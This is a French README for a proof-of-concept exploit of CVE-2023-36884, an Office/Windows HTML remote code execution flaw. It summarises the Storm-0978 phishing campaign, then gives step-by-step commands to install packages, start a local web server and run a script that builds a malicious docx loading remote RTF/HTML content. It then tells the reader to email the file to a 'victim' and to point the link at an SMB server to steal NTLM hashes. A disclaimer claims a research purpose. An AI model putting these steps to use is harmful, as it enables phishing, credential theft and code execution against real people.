
MS Office et Windows HTML RCE (CVE-2023-36884) - PoC et exploit
Le 11 juillet 2023, Microsoft a publié un correctif visant à résoudre plusieurs vulnérabilités d'exécution de code à distance (RCE) activement exploitées. Cette action a également mis en lumière une campagne de phishing orchestrée par un acteur malveillant connu sous le nom de Storm-0978, ciblant spécifiquement des organisations en Europe et en Amérique du Nord. Au cœur de cette campagne se trouvait une vulnérabilité zero-day, désignée sous le nom de CVE-2023-36884, qui permettait à l'attaquant d'exploiter des fichiers de recherche Windows via des documents Office Open eXtensible Markup Language (OOXML) minutieusement conçus, contenant des leurres géopolitiques liés au Congrès mondial ukrainien (UWC). Bien qu'une solution de contournement ait initialement été proposée pour atténuer cette vulnérabilité, Microsoft a publié une mise à jour de défense en profondeur d'Office le 8 août 2023, brisant efficacement la chaîne d'exploitation qui menait à l'exécution de code à distance via les fichiers de recherche Windows (*.search-ms).
Ce script d'exploit est écrit pour une analyse CVE sur vsociety.
Installez les paquets PIP :
pip install python-docx pywin32
Créez un fichier example.html et démarrez un serveur web HTTP Python :
New-Item -Path "example.html" - ItemType File
python -m http.server 8888
Ensuite, exécutez le script :
python gen_docx_with_rtf_altchunk.py merged.docx autolinked.rtf http://localhost:8888/example.html
Le fichier généré peut désormais être partagé avec votre victime par e-mail ou autre. Le lien peut pointer vers votre serveur SMB pour voler le hash NTLM de la victime ou vers un fichier HTML contenant une iframe avec une référence à un fichier Windows Search, comme dans le malware original. En raison du manque d'informations supplémentaires, l'exploitation exacte ne peut être montrée.
Ce script d'exploit a été créé uniquement à des fins de recherche et de développement de techniques défensives efficaces. Il n'est pas destiné à être utilisé pour des activités malveillantes ou non autorisées. L'auteur et le propriétaire du script déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce logiciel. Les utilisateurs sont invités à utiliser ce logiciel de manière responsable et uniquement conformément aux lois et réglementations applicables. Utilisez-le de manière responsable.